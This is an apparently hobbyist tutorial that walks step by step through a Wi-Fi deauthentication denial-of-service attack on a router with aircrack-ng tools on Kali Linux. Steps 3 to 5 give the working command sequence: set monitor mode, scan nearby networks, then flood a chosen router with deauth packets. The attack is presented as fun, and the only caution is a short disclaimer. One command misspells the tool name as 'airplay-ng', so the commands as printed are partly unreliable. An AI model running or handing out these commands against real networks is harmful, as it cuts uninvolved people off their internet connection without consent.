Introduction: How to Knock a Router Off the Internet (in Under 10 Minutes)

About: I'm a homeschooler & here are some of my projects.

In this tutorial I am going to show you how to run a DOS (denial of service) attack against a router. This will block people from using the router that you attack.

Let's start out with a XKCD

This tutorial will only specify how to run the attack off a linux system, don't let this discourage you, it is super easy to run a live version of Kali linux (what I used (aircrack-ng is preinstalled)) or a other linux distro (if you use a other linux distro you will need to install aircrack-ng), here are two websites that will walk you though running Kali off a usb drive https://docs.kali.org/downloading/kali-linux-live-usb-installhttps://24itworld.wordpress.com/2016/12/11/how-to-run-live-kali-linux-from-usb-drive/

This may be illegal where you live, do not run this attack at any router that you do not have permission to attack. This should not cause harm or damage to the router, but it could damage to the router, use at your own risk.

Let's have some fun.

Step 1: I Am Not Liable If This Happens

Step 2: A Video for Those Who Prefer One

Step 3: Set the Wifi Adapter to Monitor Mode

iwconfig #find the wifi adapter name

airmon-ng check kill #make sure that airmon-ng is not running

airmon-ng start wlan0 #start airman-ng and set wlan0 to monitor mode (replace wlan0 with the name of your wifi adapter)

Step 4: Find Available Networks

iwconfig #find wifi adapter name (in my case it had changed to wlan0mon)

airodump-ng wlan0mon #Monitor available networks using wlan0mon (replace wlan0mon with the name of your wifi adapter)

Step 5: Send the Junk Packets

Here is the final command

airplay-ng --deauth 1000 -a C0:56:27:4A:3F:B2 -e "NETGEAR94 2.4GHz_Ext" wlan0mon

Now I'm going to explain what each part of this command does

airplay-ng --deauth 1000 #this part sends 1000 junk packets

-a C0:56:27:4A:3F:B2 -e "NETGEAR94 2.4GHz_Ext" wlan0mon #Send those packets to a router with the BSSID "C0:56:27:4A:3F:B2" & ESSID "NETGEAR94 2.4GHz_Ext"

Replace the BSSID & ESSID with the BSSID & ESSID of the router you want to attack.

send those packets though the wifi adapter "wlan0mon" (replace wlan0mon with the name of your wifi adapter)

Step 6: Success!

It's as simple as that.

To stop sending the packets press CTL+C or close the terminal.

To rerun the last command press the up arrow then enter.

Here is Aircrack-ng's website https://aircrack-ng.org

Epilog Challenge 9

Participated in the
Epilog Challenge 9